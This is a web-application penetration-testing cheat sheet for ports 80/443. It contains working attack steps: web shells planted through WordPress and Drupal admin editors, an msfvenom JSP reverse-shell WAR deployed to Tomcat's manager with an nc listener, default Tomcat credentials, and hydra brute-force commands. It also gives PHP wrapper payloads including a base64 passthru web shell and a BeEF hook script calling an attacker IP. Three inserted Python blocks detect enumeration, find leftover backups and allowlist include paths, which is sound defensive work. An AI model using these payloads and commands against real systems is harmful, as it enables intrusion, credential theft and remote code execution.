😋Port 80-443 (http / https)

Automatic scanners

nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20

Wordpress

# Scan
wpscan --rua -e --url <URL>

# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"

Wordpress panel RCE

Modify a PHP file of the active theme (admin credentials needed)

Appearance -> Editor -> 404 Template (on the right)
Replace its content with a PHP shell, for example:
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php

Drupal

droopescan scan -u <URL>

Username enumeration

On /user/register, try to create an account with the username you are testing; if the name is already taken, the form tells you so:
*The name admin is already taken*

If you request a new password for an existing username:
*Unable to send e-mail. Contact the site administrator if the problem persists.*

If you request a new password for a non-existent username:
*Sorry, test is not recognized as a user name or an e-mail address.*

Accessing /user/<number> reveals how many users exist:
	- /user/1 -> Access denied (user exists)
	- /user/2 -> Page not found (user doesn't exist)

Hidden pages enumeration

Fuzz /node/<NUMBER>, where <NUMBER> is a number (from 1 to 500, for example).
You may find hidden pages (test, dev) that are not indexed by search engines.

wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ

Drupal panel RCE

The PHP module (plugin) must be installed: request /modules/php; a 403 means the module exists, a 404 means the PHP module isn't installed.

Go to Modules -> (Check) PHP Filter  -> Save configuration

https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php

Then click Add content -> select Basic page or Article -> paste the PHP shell into the body -> choose PHP code as the text format -> click Preview.

Joomla

joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v

Tomcat

Default credentials

The most interesting Tomcat path is /manager/html: from there you can upload and deploy WAR files (i.e. execute code). The path is protected by HTTP basic auth, and the most common credentials are:

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u
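Added example (not from the original cheat sheet): a small Python detector for the two behaviours above as they appear on the server side, a client walking /user/<n> or /node/<n> IDs (the Drupal user and node enumeration, including the wfuzz sweep) and repeated 401s on Tomcat's /manager/html (the hydra brute force). The combined log format, the thresholds and the sample lines are assumptions and constructed data, not captured traffic.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access log format (assumed; adjust LOG_RE for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# /user/<n> and /node/<n>, the two Drupal paths enumerated in the cheat sheet.
ID_PATH_RE = re.compile(r"^/(user|node)/(\d+)/?$")


def _line(ip, path, status, ts="10/Mar/2024:10:00:00 +0000"):
    """Build one constructed combined-format log line (sample data, not real traffic)."""
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log: one ID sweep, one manager brute force, one ordinary visitor.
SAMPLE_LOG = (
    [_line("203.0.113.5", f"/user/{n}", 403 if n == 1 else 404) for n in range(1, 13)]
    + [_line("198.51.100.9", "/manager/html", 401) for _ in range(6)]
    + [_line("198.51.100.9", "/manager/html", 200)]
    + [_line("192.0.2.7", "/user/1", 403),
       _line("192.0.2.7", "/node/5", 200),
       _line("192.0.2.7", "/manager/html", 401)]
)


def parse_line(line):
    """Parse a combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, sweep_threshold=10, auth_fail_threshold=5):
    """Flag clients that sweep /user|node/<n> IDs or repeatedly fail manager auth."""
    ids_seen = defaultdict(set)          # ip -> {(section, id)} distinct IDs requested
    manager_failures = defaultdict(int)  # ip -> number of 401 responses under /manager/
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        m = ID_PATH_RE.match(path)
        if m:
            ids_seen[rec["ip"]].add((m.group(1), int(m.group(2))))
        if path.startswith("/manager/") and rec["status"] == 401:
            manager_failures[rec["ip"]] += 1
    findings = []
    for ip, ids in ids_seen.items():
        if len(ids) >= sweep_threshold:
            findings.append({"ip": ip, "rule": "drupal_id_sweep", "count": len(ids)})
    for ip, n in manager_failures.items():
        if n >= auth_fail_threshold:
            findings.append({"ip": ip, "rule": "tomcat_manager_auth_failures", "count": n})
    return sorted(findings, key=lambda f: (f["ip"], f["rule"]))


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ip']}: {f['rule']} ({f['count']})")
```

Counting distinct IDs rather than requests is deliberate: the wfuzz sweep hides 404s from the attacker, but every probe still reaches the access log, and a normal visitor rarely touches more than a handful of /user/<n> or /node/<n> pages. The 401 counter ignores a single failed login and only trips on the repeated failures a wordlist produces.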

Tomcat panel RCE

# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# Upload payload
Tomcat 6:
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -

Tomcat 7 and above:
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shell&update=true'

# Listener
nc -lvp <PORT>

# Execute payload
curl http://<IP>:8080/shell/

WebDav

davtest -url <URL>

HTTP brute force authentication

HTTP basic authentication

# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15

# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307

HTTP GET request

hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>

HTTP POST request

hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>

Spidering / Brute force directories / files

gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster

Dictionaries :
   - /usr/share/wordlists/dirb/common.txt
   - /usr/share/wordlists/dirb/big.txt
   - /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

File backups

Once you have found all the files, look for backups of all the executable files (".php", ".aspx", ...). Common variations for naming a backup are:

file.ext~, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old
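Added example (not from the original cheat sheet): the same naming variants turned into an audit you can run over your own web root before a deployment, so leftover backups of executable files are found and removed before anyone else finds them. The sample file tree is constructed, and the list of executable extensions beyond .php and .aspx is an assumption.

```python
import os
import tempfile

# Extensions whose source must never be served as plain text (.php/.aspx from the
# cheat sheet; the others are an assumption, extend to match your stack).
EXEC_EXTS = (".php", ".aspx", ".asp", ".jsp")
# Backup suffixes listed in the cheat sheet.
BACKUP_SUFFIXES = ("~", ".bak", ".tmp", ".old")


def backup_candidates(filename):
    """All backup names for one executable file: file.ext~, file.ext.bak, ..., file.bak, ..."""
    base, _ext = os.path.splitext(filename)
    names = {filename + s for s in BACKUP_SUFFIXES}            # file.ext~, file.ext.bak, ...
    names |= {base + s for s in BACKUP_SUFFIXES if s != "~"}   # file.bak, file.tmp, file.old
    return names


def find_backup_leftovers(paths):
    """Given relative paths under a web root, return those that are backups of executables."""
    present = set(paths)
    found = set()
    for p in paths:
        directory, name = os.path.split(p)
        if os.path.splitext(name)[1].lower() not in EXEC_EXTS:
            continue
        for candidate in backup_candidates(name):
            full = os.path.join(directory, candidate)
            if full in present:
                found.add(full)
    return sorted(found)


def scan_webroot(root):
    """Walk a real directory and report leftover backups, paths relative to root."""
    rel = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            rel.append(os.path.relpath(os.path.join(dirpath, f), root).replace(os.sep, "/"))
    return find_backup_leftovers(rel)


# Constructed sample tree: four leftovers, plus a CSS backup that is not a finding.
SAMPLE_TREE = [
    "index.php", "index.php~",
    "admin/login.php", "admin/login.bak", "admin/login.php.old",
    "css/style.css", "css/style.css.bak",
    "readme.txt",
    "upload.aspx", "upload.aspx.tmp",
]


def demo_scan():
    """Materialise SAMPLE_TREE in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel in SAMPLE_TREE:
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            open(full, "w").close()
        return scan_webroot(root)


if __name__ == "__main__":
    for path in demo_scan():
        print("leftover backup:", path)
```

Only backups that sit next to a live executable of the same name are reported, which mirrors how the variants above are actually tried; a stray style.css.bak is harmless because the server would serve the original as plain text anyway.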

Local File Inclusion / Remote File Inclusion - LFI / RFI

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

Wrappers

Wrapper php://filter

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=

Wrapper expect://

http://example.com/index.php?page=expect://id

Wrapper data://

echo '<?php phpinfo(); ?>' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=

If the code executes, you should see the phpinfo() output; check disable_functions there and build a payload using functions that are not disabled.

Code execution with:
	- exec
	- shell_exec
	- system
	- passthru
	- popen

# Example
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

If "Shell done !" appears on the page, there is code execution and you can run commands like:

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls

Wrapper php://input

curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"
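Added example (not from the original cheat sheet): every wrapper above works because the vulnerable pattern is `include($_GET['page'])` with the raw parameter reaching the include. The fix is an allowlist of page names, shown here in Python as a stand-in for the PHP handler, together with a classifier that labels the refused value (stream wrapper, null byte, traversal) so the attempt can be logged. The template directory and the page allowlist are hypothetical.

```python
import os
import re
from urllib.parse import unquote

# Hypothetical application layout and allowlist; neither comes from the cheat sheet.
TEMPLATE_DIR = "/var/www/app/pages"
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}

# Anything that starts like a URL scheme: php:, data:, expect:, file:, http: ...
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def classify_page_param(raw):
    """Name the attack shape of a raw `page` value, or return None if it looks benign.

    The allowlist lookup in resolve_page() is what actually blocks the inclusion;
    this classifier only labels a refused request so it can be logged or alerted on.
    """
    value = unquote(raw)            # one decode round, as PHP does for $_GET
    if "\x00" in value:
        return "null-byte"
    if SCHEME_RE.match(value):      # php://filter, data://, expect://, php://input, http://
        return "stream-wrapper-or-url:" + value.split(":", 1)[0].lower()
    if ".." in value or "/" in value or "\\" in value:
        return "path-traversal"
    return None


def resolve_page(raw):
    """Map a request's `page` value to a template path.

    Returns (path, None) on success, or (None, reason) when the value is refused.
    Unknown names are refused even when they look harmless: only PAGES is included.
    """
    reason = classify_page_param(raw)
    if reason is not None:
        return None, reason
    filename = PAGES.get(raw)
    if filename is None:
        return None, "not-in-allowlist"
    return os.path.join(TEMPLATE_DIR, filename), None


if __name__ == "__main__":
    for probe in ("about", "php://filter/convert.base64-encode/resource=index",
                  "data://text/plain;base64,PD9waHA=", "expect://id", "../../etc/passwd"):
        print(probe, "->", resolve_page(probe))
```

Setting allow_url_include=Off in php.ini refuses data:// and php://input (and remote URLs) at include time, but php://filter still reads local files, so the allowlist is what closes the source-disclosure case; the classifier exists so the rejected values from the wrappers above show up in your logs as named attack shapes rather than generic errors.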

Useful LFI list

# Linux
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

# Windows
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

# Both
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt

Tools

kadimus --url <URL>
python lfisuite.py

Command injection

For command injection, always use Burp Suite!

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Deserialization

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization

File upload

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

SQL injection

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli

XSS

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

beef-xss
cat /usr/share/beef-xss/config.yaml | grep user -C 1 # user / password
<script src="http://<IP>:3000/hook.js"></script>

Other web vulnerabilities

https://github.com/swisskyrepo/PayloadsAllTheThings

Upload a file with PUT

curl -X PUT http://<IP>/<FILE> -d @<FILE>  -v
